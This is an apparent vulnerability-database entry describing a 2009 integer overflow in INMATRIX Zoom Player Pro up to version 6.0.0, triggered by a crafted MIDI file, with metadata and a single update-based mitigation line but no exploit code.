Vendor: Zoom Player Pro
By: Dr_IDE
CVSS: 7.5 (HIGH)
CWE: 190 (Integer Overflow)
Product Name: Zoom Player Pro
Affected Version From: 5.0.2
Affected Version To: 6.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:inmatrix:zoom_player_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009
INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC
This PoC exploits an integer overflow vulnerability in INMATRIX Zoom Player Pro versions 5.0.2 and 6.0.0 on Windows XP SP3. The vulnerability is triggered when a specially crafted MIDI file is opened, which causes a buffer overflow. The MIDI structure must be accurate for the exploit to work.
Mitigation:
Update to the latest version of INMATRIX Zoom Player Pro.